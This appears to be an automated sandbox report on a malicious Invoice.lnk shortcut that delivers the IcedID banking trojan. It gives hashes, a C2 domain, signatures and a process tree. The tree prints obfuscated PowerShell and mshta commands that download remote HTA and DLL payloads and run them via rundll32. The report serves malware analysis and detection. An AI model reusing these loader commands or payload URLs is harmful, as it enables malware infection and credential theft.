Analysis

  • max time kernel
    35s
  • max time network
    38s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    06-07-2022 20:36

General

  • Target

    Invoice.lnk

  • Size

    178KB

  • MD5

    c29d6fc092698aafe01ece64da57254f

  • SHA1

    523e8303f8d6853ef499b742ef5e9d7485803a88

  • SHA256

    d94a96230551df45ea50a618f4ef47ab5f2cceaa612da2acdbd05a34b3e32cae

  • SHA512

    fa37a95c3eb1256bea25cc19f84de5de77f24a38938e062a08fab2073a8cc9ca480fa58fc90103f0e298958605866b1ec192971099dcaca4966bd134ac243e50

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://comradespoon.com/5h.hta

Extracted

Family

icedid

Campaign

1487191074

C2

vneastruzz.com

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • suricata: ET MALWARE Win32/IcedID Request Cookie

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Invoice.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:240
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $OIdEhQrv = [convert]::FromBase64String('PjIv');$FByAlEjZ = [convert]::FromBase64String('GgQfAxZXHwMDB01YWBQYGgUWExIEBxgYGVkUGBpYQh9ZHwMW');$yZlUjspn = -join($OIdEhQrv | % {[char] ($_ -bxor 0x77)});$lMhAVEem = -join ($FByAlEjZ | % { [char] ($_ -bxor 0x77)});sal UFRBSlOH $yZlUjspn;UFRBSlOH $lMhAVEem
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:268
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" http://comradespoon.com/5h.hta
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1000
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function lpasD($HADYWKdP, $JQNbwy){[IO.File]::WriteAllBytes($HADYWKdP, $JQNbwy)};function UrOfCPrL($HADYWKdP){if($HADYWKdP.EndsWith((qQtFjAStmmZUquwlKa @(65433,65487,65495,65495))) -eq $True){Start-Process (qQtFjAStmmZUquwlKa @(rundll32.exe $HADYWKdP ,PluginInit ))}elseif($HADYWKdP.EndsWith((qQtFjAStmmZUquwlKa @(65433,65499,65502,65436))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $HADYWKdP}else{Start-Process $HADYWKdP}};function iaeLEXNRYglRNM($lpasD){$ssPVUzIfuhNMPpFbC=(qQtFjAStmmZUquwlKa @(65459,65492,65487,65487,65488,65497));$uAbUQLrXxwt=(Get-ChildItem $lpasD -Force);$uAbUQLrXxwt.Attributes=$uAbUQLrXxwt.Attributes -bor ([IO.FileAttributes]$ssPVUzIfuhNMPpFbC).value__};function BRrXupXAZjXJXcLwJn($fRadwPdaCcH){$ZudUcOaTTWDij = New-Object (qQtFjAStmmZUquwlKa @(65465,65488,65503,65433,65474,65488,65485,65454,65495,65492,65488,65497,65503));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$JQNbwy = $ZudUcOaTTWDij.DownloadData($fRadwPdaCcH);return $JQNbwy};function qQtFjAStmmZUquwlKa($aiWdOwItl){$JGtzYUbtTnusApt=65387;$ouOlcqQbirCOt=$Null;foreach($ALFUNolW in $aiWdOwItl){$ouOlcqQbirCOt+=[char]($ALFUNolW-$JGtzYUbtTnusApt)};return $ouOlcqQbirCOt};function bdpFrZCPoqatcoUiW(){$QuseLIVGitH = $env:ProgramData + '\';$LbGea = $QuseLIVGitH + '1.dll'; if (Test-Path -Path $LbGea){UrOfCPrL $LbGea;}Else{ $oGMWxNZW = BRrXupXAZjXJXcLwJn (qQtFjAStmmZUquwlKa @(65491,65503,65503,65499,65445,65434,65434,65486,65498,65496,65501,65484,65487,65488,65502,65499,65498,65498,65497,65433,65486,65498,65496,65434,65436,65433,65487,65495,65495));lpasD $LbGea $oGMWxNZW;UrOfCPrL $LbGea;};iaeLEXNRYglRNM $LbGea;;;;;}bdpFrZCPoqatcoUiW;
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1932
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\ProgramData\1.dll PluginInit
            5⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            PID:1848

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Defense Evasion
    Modify Registry (T1112): 1

  • Discovery
    System Information Discovery (T1082): 1

Downloads

  • C:\ProgramData\1.dll
    Filesize

    813KB

    MD5

    35999cd6417ae33f264178adb800d560

    SHA1

    74276d57902e683fbcddb313cb34b0f92bcb52df

    SHA256

    1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

    SHA512

    78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d
